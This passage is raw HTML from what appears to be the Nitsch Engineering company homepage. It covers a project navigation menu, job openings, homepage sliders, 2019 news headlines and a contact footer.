class="menu-item menu-item-type-post_type menu-item-object-project menu-item-885"><a href="http://www.nitscheng.com/project/boston-renaissance-charter-school/">Boston Renaissance Charter School</a></li> <li id="menu-item-884" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-884"><a href="http://www.nitscheng.com/project/belmont-hill-school/">Belmont Hill School</a></li> <li id="menu-item-883" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-883"><a href="http://www.nitscheng.com/project/kipp-academy/">Kipp Academy</a></li> <li id="menu-item-882" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-882"><a href="http://www.nitscheng.com/project/shady-hill-school/">Shady Hill School</a></li> <li id="menu-item-881" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-881"><a href="http://www.nitscheng.com/project/medway-high-school/">Medway High School</a></li> <li id="menu-item-880" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-880"><a href="http://www.nitscheng.com/project/rogers-magnet-school/">Rogers Magnet School</a></li> <li id="menu-item-879" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-879"><a href="http://www.nitscheng.com/project/belmont-elementary-school/">Belmont Elementary School</a></li> <li id="menu-item-878" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-878"><a href="http://www.nitscheng.com/project/longmeadow-high-school/">Longmeadow High School</a></li> <li id="menu-item-877" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-877"><a href="http://www.nitscheng.com/project/john-d-runkle-elementary-school/">John D. Runkle<br>Elementary School</a></li> <li id="menu-item-876" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-876"><a href="http://www.nitscheng.com/project/buckingham-browne-nichols-school/">Buckingham Browne &#038;<br>Nichols School</a></li> </ul> </li> <li id="menu-item-311" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-311"><a href="http://www.nitscheng.com/projects/multi-family-housing/">Multi-Family Housing</a> <ul class="sub-menu"> <li id="menu-item-2379" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-2379"><a href="http://www.nitscheng.com/project/dalton-street-mixed-use-development/">Dalton Street Mixed-Use Development</a></li> <li id="menu-item-2378" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-2378"><a href="http://www.nitscheng.com/project/millennium-tower/">Millennium Tower</a></li> <li id="menu-item-845" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-845"><a href="http://www.nitscheng.com/project/the-homes-at-old-colony/">The Homes at Old Colony</a></li> <li id="menu-item-844" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-844"><a href="http://www.nitscheng.com/project/the-edge/">The Edge</a></li> <li id="menu-item-843" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-843"><a href="http://www.nitscheng.com/project/the-kensington/">The Kensington</a></li> <li id="menu-item-842" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-842"><a href="http://www.nitscheng.com/project/archstone-avenir-at-north-station/">Archstone Avenir at <br>North Station</a></li> <li id="menu-item-841" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-841"><a href="http://www.nitscheng.com/project/the-carruth/">The Carruth</a></li> <li id="menu-item-839" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-839"><a href="http://www.nitscheng.com/project/washington-beech-housing/">Washington-Beech Housing</a></li> <li id="menu-item-838" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-838"><a href="http://www.nitscheng.com/project/saint-polycarp-village/">Saint Polycarp Village</a></li> <li id="menu-item-837" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-837"><a href="http://www.nitscheng.com/project/maverick-landing/">Maverick Landing</a></li> <li id="menu-item-836" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-836"><a href="http://www.nitscheng.com/project/orchard-park/">Orchard Park</a></li> </ul> </li> <li id="menu-item-313" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-313"><a href="http://www.nitscheng.com/projects/museums-cultural-institutions/">Museums / Cultural Institutions</a> <ul class="sub-menu"> <li id="menu-item-831" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-831"><a href="http://www.nitscheng.com/project/edward-m-kennedy-institute/">Edward M. Kennedy Institute</a></li> <li id="menu-item-830" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-830"><a href="http://www.nitscheng.com/project/fogg-art-museum/">Harvard University, Fogg Art Museum</a></li> <li id="menu-item-829" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-829"><a href="http://www.nitscheng.com/project/728/">Isabella Stewart Gardner Museum</a></li> <li id="menu-item-828" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-828"><a href="http://www.nitscheng.com/project/national-palace-museum-southern-branch/">National Palace Museum, <br>Southern Branch</a></li> <li id="menu-item-827" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-827"><a href="http://www.nitscheng.com/project/boston-tea-party-museum-and-ships/">Boston Tea Party Museum and Ships</a></li> <li id="menu-item-826" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-826"><a href="http://www.nitscheng.com/project/museum-of-fine-arts-expansion/">Museum of Fine Arts Expansion</a></li> </ul> </li> <li id="menu-item-312" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-312"><a href="http://www.nitscheng.com/projects/peer-reviews/">Peer Reviews</a> <ul class="sub-menu"> <li id="menu-item-1465" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-1465"><a href="http://www.nitscheng.com/project/municipal-consulting-state-wide/">Municipal Consulting</a></li> <li id="menu-item-890" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-890"><a href="http://www.nitscheng.com/project/consulting-engineering-groton/">Consulting Engineering, Groton</a></li> <li id="menu-item-889" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-889"><a href="http://www.nitscheng.com/project/consulting-engineering-raynham/">Consulting Engineering, Raynham</a></li> <li id="menu-item-888" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-888"><a href="http://www.nitscheng.com/project/consulting-engineering-weston/">Consulting Engineering, Weston</a></li> </ul> </li> <li id="menu-item-314" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-314"><a href="http://www.nitscheng.com/projects/planning/">Planning</a> <ul class="sub-menu"> <li id="menu-item-2303" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-2303"><a href="http://www.nitscheng.com/project/town-of-kingston-master-plan-update/">Town of Kingston Master Plan Update</a></li> <li id="menu-item-906" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-906"><a href="http://www.nitscheng.com/project/lower-hill-redevelopment/">Lower Hill Redevelopment</a></li> <li id="menu-item-905" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-905"><a href="http://www.nitscheng.com/project/harvard-business-school/">Harvard Business School, Stormwater Master Plan</a></li> <li id="menu-item-904" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-904"><a href="http://www.nitscheng.com/project/princeton-campus-plan/">Princeton University, Campus Plan</a></li> <li id="menu-item-903" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-903"><a href="http://www.nitscheng.com/project/stadium-district-green-infrastructure/">Stadium District Green <br>Infrastructure</a></li> <li id="menu-item-902" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-902"><a href="http://www.nitscheng.com/project/yale-science-hill-master-plan/">Yale University, Science Hill Master Plan</a></li> <li id="menu-item-901" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-901"><a href="http://www.nitscheng.com/project/riverlife-vision-project/">Riverlife Vision Project</a></li> <li id="menu-item-900" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-900"><a href="http://www.nitscheng.com/project/brandeis-university/">Brandeis University</a></li> <li id="menu-item-899" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-899"><a href="http://www.nitscheng.com/project/meadow-creek-master-plan/">University of Virginia, Meadow Creek Master Plan</a></li> <li id="menu-item-1984" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-1984"><a href="http://www.nitscheng.com/project/university-virginia-distillery-branch-green-infrastructure-retrofits/">University of Virginia, Distillery Branch Green Infrastructure Retrofits</a></li> <li id="menu-item-898" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-898"><a href="http://www.nitscheng.com/project/wilmington-public-schools/">Wilmington Public Schools</a></li> <li id="menu-item-897" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-897"><a href="http://www.nitscheng.com/project/sassaquin-pond-restoration/">Sassaquin Pond Restoration</a></li> </ul> </li> <li id="menu-item-2383" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-2383"><a href="http://www.nitscheng.com/projects/public-government-municipal/">Public / Government / Municipal</a> <ul class="sub-menu"> <li id="menu-item-2384" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-2384"><a href="http://www.nitscheng.com/project/boston-public-library-johnson-building/">Boston Public Library, Johnson Building</a></li> <li id="menu-item-2385" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-2385"><a href="http://www.nitscheng.com/project/old-city-hall/">Old City Hall</a></li> </ul> </li> <li id="menu-item-315" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-315"><a href="http://www.nitscheng.com/projects/recreational/">Recreational</a> <ul class="sub-menu"> <li id="menu-item-1317" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-1317"><a href="http://www.nitscheng.com/project/brooklyn-bridge-park/">Brooklyn Bridge Park</a></li> <li id="menu-item-1318" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-1318"><a href="http://www.nitscheng.com/project/south-river-park/">South River Park</a></li> <li id="menu-item-1319" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-1319"><a href="http://www.nitscheng.com/project/frick-park-environmental-center/">Frick Park Environmental Center</a></li> <li id="menu-item-1320" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-1320"><a href="http://www.nitscheng.com/project/mill-river-park/">Mill River Park</a></li> <li id="menu-item-1321" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-1321"><a href="http://www.nitscheng.com/project/washington-canal-park/">Washington Canal Park</a></li> <li id="menu-item-1322" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-1322"><a href="http://www.nitscheng.com/project/the-new-york-botanical-garden/">The New York Botanical Garden</a></li> <li id="menu-item-1323" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-1323"><a href="http://www.nitscheng.com/project/bass-river-park/">Bass River Park</a></li> <li id="menu-item-1324" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-1324"><a href="http://www.nitscheng.com/project/cape-cod-rail-trail/">Cape Cod Rail Trail</a></li> </ul> </li> <li id="menu-item-316" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-316"><a href="http://www.nitscheng.com/projects/transportation/">Transportation</a> <ul class="sub-menu"> <li id="menu-item-2406" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-2406"><a href="http://www.nitscheng.com/project/seaver-street-improvements/">Seaver Street Improvements</a></li> <li id="menu-item-2400" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-2400"><a href="http://www.nitscheng.com/project/trapelo-road-improvements/">Trapelo Road Improvements</a></li> <li id="menu-item-2413" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-2413"><a href="http://www.nitscheng.com/project/pleasant-street-improvements/">Pleasant Street Improvements</a></li> <li id="menu-item-2376" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-2376"><a href="http://www.nitscheng.com/project/route-5-conz-street-intersection-improvements/">Route 5/Conz Street Intersection Improvements</a></li> <li id="menu-item-925" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-925"><a href="http://www.nitscheng.com/project/peabody-square/">Peabody Square</a></li> <li id="menu-item-924" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-924"><a href="http://www.nitscheng.com/project/tiffany-street/">Tiffany Street</a></li> <li id="menu-item-923" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-923"><a href="http://www.nitscheng.com/project/kennedy-street-green-infrastructure/">Kennedy Street, <br>Green Infrastructure</a></li> <li id="menu-item-922" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-922"><a href="http://www.nitscheng.com/project/fenway-area-street-survey/">Fenway Area Street Survey</a></li> <li id="menu-item-921" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-921"><a href="http://www.nitscheng.com/project/solar-traffic-signal-systems/">Solar Traffic Signal Systems</a></li> <li id="menu-item-920" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-920"><a href="http://www.nitscheng.com/project/john-w-olver-transit-center/">John W. Olver Transit Center</a></li> <li id="menu-item-919" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-919"><a href="http://www.nitscheng.com/project/city-of-boston-on-call-contract/">City of Boston On-Call Contract</a></li> </ul> </li> <li id="menu-item-317" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-317"><a href="http://www.nitscheng.com/projects/utilities/">Utilities</a> <ul class="sub-menu"> <li id="menu-item-931" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-931"><a href="http://www.nitscheng.com/project/nash-hill-reservoir/">Nash Hill Reservoir</a></li> <li id="menu-item-930" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-930"><a href="http://www.nitscheng.com/project/chelsea-river/">Chelsea River</a></li> <li id="menu-item-929" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-929"><a href="http://www.nitscheng.com/project/blue-hill-reservoir/">Blue Hill Reservoir</a></li> <li id="menu-item-928" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-928"><a href="http://www.nitscheng.com/project/hultman-aqueduct/">Hultman Aqueduct</a></li> <li id="menu-item-927" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-927"><a href="http://www.nitscheng.com/project/nstar-118119-line/">NSTAR 118/119 Line</a></li> <li id="menu-item-926" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-926"><a href="http://www.nitscheng.com/project/fall-river-cso-surveys/">Fall River CSO Surveys</a></li> </ul> </li> </ul> </li> <li id="menu-item-41" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-41"><a href="http://www.nitscheng.com/news-insights/">News &#038; Insights</a></li> <li id="menu-item-40" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-40"><a href="http://www.nitscheng.com/careers/life-nitsch/">Careers</a> <ul class="sub-menu"> <li id="menu-item-236" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-236"><a href="http://www.nitscheng.com/careers/life-nitsch/">Life @ Nitsch</a> <ul class="sub-menu"> <li id="menu-item-235" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-235"><a href="http://www.nitscheng.com/careers/culture/">Culture</a></li> </ul> </li> <li id="menu-item-234" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-234"><a href="http://www.nitscheng.com/careers/benefits/">Benefits</a></li> <li id="menu-item-237" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-237"><a href="http://www.nitscheng.com/careers/opportunities/">Opportunities</a> <ul class="sub-menu"> <li id="menu-item-2444" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2444"><a href="http://www.nitscheng.com/careers/life-nitsch/traffic-engineering-manager-boston-lawrence-or-worcester/">Traffic Engineering Department Head – Boston, Lawrence, or Worcester</a></li> <li id="menu-item-2558" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2558"><a href="http://www.nitscheng.com/careers/opportunities/transportation-designerengineer/">Highway / Transportation Designer / Engineer – Boston, Lawrence, or Worcester</a></li> <li id="menu-item-2600" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2600"><a href="http://www.nitscheng.com/traffic-analyst-engineer-boston-worcester-or-lawrence/">Traffic Analyst/Engineer– Boston, Worcester, or Lawrence</a></li> <li id="menu-item-2590" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2590"><a href="http://www.nitscheng.com/careers/opportunities/project-engineer/">Project Engineer – Boston, Lawrence or Worcester</a></li> <li id="menu-item-2551" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2551"><a href="http://www.nitscheng.com/careers/opportunities/project-designer/">Project Designer – Boston</a></li> <li id="menu-item-2568" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2568"><a href="http://www.nitscheng.com/careers/opportunities/crew-chief-2/">Crew Chief</a></li> <li id="menu-item-2572" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2572"><a href="http://www.nitscheng.com/careers/life-nitsch/traffic-engineering-manager-boston-lawrence-or-worcester/instrument-operator/">Instrument Operator</a></li> </ul> </li> </ul> </li> <li id="menu-item-1646" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1646"><a href="http://www.nitscheng.com/contact-us/contact/">Contact Us</a> <ul class="sub-menu"> <li id="menu-item-1647" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1647"><a href="http://www.nitscheng.com/contact-us/contact/">Contact</a></li> <li id="menu-item-226" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-226"><a href="http://www.nitscheng.com/contact-us/boston-office/">Boston, MA</a></li> <li id="menu-item-227" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-227"><a href="http://www.nitscheng.com/contact-us/worcester-office/">Worcester, MA</a></li> <li id="menu-item-1482" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1482"><a href="http://www.nitscheng.com/contact-us/lawrence-ma-office/">Lawrence, MA</a></li> <li id="menu-item-1488" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1488"><a href="http://www.nitscheng.com/contact-us/washington-dc-office/">Washington, DC</a></li> </ul> </li> </ul></div> </nav> </div> </div><!--//end .container--> <div class="container slider-container"><!--start container--> <div class="slider-content"> <div class="flexslider"> <ul class="slides"> <li><a href="http://www.nitscheng.com/careers/life-nitsch/"><img width="1244" height="420" src="http://www.nitscheng.com/wp-content/uploads/2018/12/Homepage-Slider-Globe-Top-Places-2018-1244x420.jpg" class="attachment-slideshow_thumbnail size-slideshow_thumbnail" alt="We&#039;re Hiring! The Boston Globe Top Places to Work 2018" srcset="http://www.nitscheng.com/wp-content/uploads/2018/12/Homepage-Slider-Globe-Top-Places-2018.jpg 1244w, http://www.nitscheng.com/wp-content/uploads/2018/12/Homepage-Slider-Globe-Top-Places-2018-300x102.jpg 300w, http://www.nitscheng.com/wp-content/uploads/2018/12/Homepage-Slider-Globe-Top-Places-2018-768x260.jpg 768w, http://www.nitscheng.com/wp-content/uploads/2018/12/Homepage-Slider-Globe-Top-Places-2018-1024x347.jpg 1024w, http://www.nitscheng.com/wp-content/uploads/2018/12/Homepage-Slider-Globe-Top-Places-2018-252x85.jpg 252w" sizes="(max-width: 1244px) 100vw, 1244px" /></a></li> <li><a href="http://www.nitscheng.com/services/green-infrastructure/climate-change-resiliency/"><img width="1244" height="420" src="http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-1-1244x420.jpg" class="attachment-slideshow_thumbnail size-slideshow_thumbnail" alt="" srcset="http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-1-1244x420.jpg 1244w, http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-1-300x102.jpg 300w, http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-1-768x260.jpg 768w, http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-1-1024x347.jpg 1024w, http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-1.jpg 2488w, http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-1-252x85.jpg 252w" sizes="(max-width: 1244px) 100vw, 1244px" /></a></li> <li><a href="http://www.nitscheng.com/2017/06/nitsch-engineering-opens-washington-d-c-office/"><img width="1244" height="420" src="http://www.nitscheng.com/wp-content/uploads/2016/06/Homepage-Sliders-dc-1244x420.jpg" class="attachment-slideshow_thumbnail size-slideshow_thumbnail" alt="" srcset="http://www.nitscheng.com/wp-content/uploads/2016/06/Homepage-Sliders-dc.jpg 1244w, http://www.nitscheng.com/wp-content/uploads/2016/06/Homepage-Sliders-dc-300x102.jpg 300w, http://www.nitscheng.com/wp-content/uploads/2016/06/Homepage-Sliders-dc-768x260.jpg 768w, http://www.nitscheng.com/wp-content/uploads/2016/06/Homepage-Sliders-dc-1024x347.jpg 1024w, http://www.nitscheng.com/wp-content/uploads/2016/06/Homepage-Sliders-dc-252x85.jpg 252w" sizes="(max-width: 1244px) 100vw, 1244px" /></a></li> <li><a href="http://www.nitscheng.com/services/green-infrastructure/"><img width="1244" height="420" src="http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-3-1244x420.jpg" class="attachment-slideshow_thumbnail size-slideshow_thumbnail" alt="" srcset="http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-3-1244x420.jpg 1244w, http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-3-300x102.jpg 300w, http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-3-768x260.jpg 768w, http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-3-1024x347.jpg 1024w, http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-3.jpg 2488w, http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-3-252x85.jpg 252w" sizes="(max-width: 1244px) 100vw, 1244px" /></a></li> <li><a href="http://www.nitscheng.com/services/land-surveying/"><img width="1244" height="420" src="http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-4-1244x420.jpg" class="attachment-slideshow_thumbnail size-slideshow_thumbnail" alt="" srcset="http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-4-1244x420.jpg 1244w, http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-4-300x102.jpg 300w, http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-4-768x260.jpg 768w, http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-4-1024x347.jpg 1024w, http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-4.jpg 2488w, http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-4-252x85.jpg 252w" sizes="(max-width: 1244px) 100vw, 1244px" /></a></li> <li><a href="http://www.nitscheng.com/services/transportation-engineering/"><img width="1244" height="420" src="http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-5-1244x420.jpg" class="attachment-slideshow_thumbnail size-slideshow_thumbnail" alt="" srcset="http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-5-1244x420.jpg 1244w, http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-5-300x102.jpg 300w, http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-5-768x260.jpg 768w, http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-5-1024x347.jpg 1024w, http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-5.jpg 2488w, http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-5-252x85.jpg 252w" sizes="(max-width: 1244px) 100vw, 1244px" /></a></li> <li><a href="http://www.nitscheng.com/about-us/corporate-citizenship/"><img width="1244" height="420" src="http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-6-1244x420.jpg" class="attachment-slideshow_thumbnail size-slideshow_thumbnail" alt="" srcset="http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-6-1244x420.jpg 1244w, http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-6-300x102.jpg 300w, http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-6-768x260.jpg 768w, http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-6-1024x347.jpg 1024w, http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-6.jpg 2488w, http://www.nitscheng.com/wp-content/uploads/2016/06/homepage-slider-6-252x85.jpg 252w" sizes="(max-width: 1244px) 100vw, 1244px" /></a></li> </ul> </div> </div> </div><!--//end .container--> <div class="container clearfix"><!--start container--> <div class="center-content"> <div class="feature-content"> <div id="left-feature"> <div class="meet-nitsch"> <h2><a href="http://www.nitscheng.com/about-us/our-mission/">Meet Nitsch</a></h2> <p>Here at Nitsch Engineering our civil, transportation, and structural engineers; land surveyors; planners; and GIS specialists deliver <span style="color: #f5d317;">client-focused</span>, <span style="color: #f5d317;">creative</span>, <span style="color: #f5d317;">cost-effective</span>, and <span style="color: #f5d317;">sustainable</span> project solutions to our building/site development and infrastructure clients. <span style="color: #f5d317;">How can we help you today?</span></p> </div> <div class="right-feature phone-view"> <h2><a href="http://www.nitscheng.com/news-insights/">What's Hot</a></h2> <div class="post-section"> <div class="post-item"> <small>May 14, 2019</small> <h3><a href="http://www.nitscheng.com/2019/05/wts-boston-unveils-public-art-celebrating-women-in-transportation/">WTS-Boston Unveils Public Art Celebrating Women in Transportation</a></h3> </div> <div class="post-item"> <small>April 15, 2019</small> <h3><a href="http://www.nitscheng.com/2019/04/scott-turner-talking-about-smart-sustainable-development-at-apa/">Scott Turner talking about smart &#038; sustainable development at APA</a></h3> </div> <div class="post-item"> <small>April 1, 2019</small> <h3><a href="http://www.nitscheng.com/2019/04/nitsch-engineering-recognized-by-united-way-for-increasing-stem-education-opportunities/">Nitsch Engineering Recognized by United Way for Increasing STEM Education Opportunities</a></h3> </div> <div class="post-item"> <small>March 22, 2019</small> <h3><a href="http://www.nitscheng.com/2019/03/jessica-wala-named-acec-ma-young-professional-of-the-year/">Jessica Wala Named ACEC/MA Young Professional of the Year</a></h3> </div> <div class="post-item"> <small>March 21, 2019</small> <h3><a href="http://www.nitscheng.com/2019/03/mits-north-corridor-project-wins-acec-ma-engineering-excellence-award/">MIT’s North Corridor Project Wins ACEC/MA Engineering Excellence Award</a></h3> </div> <div class="post-item"> <small>February 11, 2019</small> <h3><a href="http://www.nitscheng.com/2019/02/lisa-brothers-and-judy-nitsch-awarded-honorary-bsa-membership/">Lisa Brothers and Judy Nitsch Awarded Honorary BSA Membership</a></h3> </div> </div> <a href="http://www.nitscheng.com/news-insights/" class="btn-viewall">View All Recent News</a> </div> <div class="feature-section"> <div class="twitter-feature"> <h3><a href="https://twitter.com/nitscheng" target="_blank">Top Tweets</a></h3> <div class="twitter-content"> <div class="twitter-info"> <a class="twitter-timeline" href="https://twitter.com/nitscheng" data-theme="dark" data-link-color="#005688" data-chrome="noheader nofooter noborders transparent" data-aria-polite="assertive">Tweets by nitscheng</a> <script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script> </div> </div> </div> <div class="feature"> <h3>Featured</h3> <p>Learn what &#8220;building better communities with you&#8221; means to us!</p> <div class="feature-video"> <a class="fancybox-media" href="http://www.youtube.com/watch?v=fMdMXSz__3Q"><small></small><img width="358" height="200" src="http://www.nitscheng.com/wp-content/uploads/2016/06/BUILDING-BETTER-COMMUNITIES-thumbnail-358x200.jpg" class="attachment-video_thumbnail size-video_thumbnail" alt="Building better communities with you" srcset="http://www.nitscheng.com/wp-content/uploads/2016/06/BUILDING-BETTER-COMMUNITIES-thumbnail-358x200.jpg 358w, http://www.nitscheng.com/wp-content/uploads/2016/06/BUILDING-BETTER-COMMUNITIES-thumbnail-300x169.jpg 300w, http://www.nitscheng.com/wp-content/uploads/2016/06/BUILDING-BETTER-COMMUNITIES-thumbnail-768x432.jpg 768w, http://www.nitscheng.com/wp-content/uploads/2016/06/BUILDING-BETTER-COMMUNITIES-thumbnail-1024x576.jpg 1024w, http://www.nitscheng.com/wp-content/uploads/2016/06/BUILDING-BETTER-COMMUNITIES-thumbnail-252x142.jpg 252w, http://www.nitscheng.com/wp-content/uploads/2016/06/BUILDING-BETTER-COMMUNITIES-thumbnail.jpg 1920w" sizes="(max-width: 358px) 100vw, 358px" /></a> </div> </div> </div> </div> <div class="right-feature desktop-view tablet-view"> <h2><a href="http://www.nitscheng.com/news-insights/">What's Hot</a></h2> <div class="post-section"> <div class="post-item"> <small>May 14, 2019</small> <h3><a href="http://www.nitscheng.com/2019/05/wts-boston-unveils-public-art-celebrating-women-in-transportation/">WTS-Boston Unveils Public Art Celebrating Women in Transportation</a></h3> </div> <div class="post-item"> <small>April 15, 2019</small> <h3><a href="http://www.nitscheng.com/2019/04/scott-turner-talking-about-smart-sustainable-development-at-apa/">Scott Turner talking about smart &#038; sustainable development at APA</a></h3> </div> <div class="post-item"> <small>April 1, 2019</small> <h3><a href="http://www.nitscheng.com/2019/04/nitsch-engineering-recognized-by-united-way-for-increasing-stem-education-opportunities/">Nitsch Engineering Recognized by United Way for Increasing STEM Education Opportunities</a></h3> </div> <div class="post-item"> <small>March 22, 2019</small> <h3><a href="http://www.nitscheng.com/2019/03/jessica-wala-named-acec-ma-young-professional-of-the-year/">Jessica Wala Named ACEC/MA Young Professional of the Year</a></h3> </div> <div class="post-item"> <small>March 21, 2019</small> <h3><a href="http://www.nitscheng.com/2019/03/mits-north-corridor-project-wins-acec-ma-engineering-excellence-award/">MIT’s North Corridor Project Wins ACEC/MA Engineering Excellence Award</a></h3> </div> <div class="post-item"> <small>February 11, 2019</small> <h3><a href="http://www.nitscheng.com/2019/02/lisa-brothers-and-judy-nitsch-awarded-honorary-bsa-membership/">Lisa Brothers and Judy Nitsch Awarded Honorary BSA Membership</a></h3> </div> </div> <a href="http://www.nitscheng.com/news-insights/" class="btn-viewall">View All Recent News</a> </div> </div> </div> </div><!--//end .container--> <div class="container social-container"><!--start container--> <div class="center-content"> <div class="social-content"></div> </div> </div><!--//end .container--> <div class="container footer-container"><!--start container--> <div class="center-content"> <footer id="footer"> <div class="footer-box contact-info"> <span><small class="desktop-view tablet-view">Boston:</small><small class="phone-view phone-view-inline">Headquarters:</small> (617) 338-0063</span> <span class="desktop-view tablet-view"><small>Worcester:</small> (508) 365-1030</span> <span><a href="mailto:[email protected]">[email protected]</a></span> </div> <ul> <li>&copy; 2019 Nitsch Engineering</li> <li>A Women-owned Business Enterprise</li> <li><a 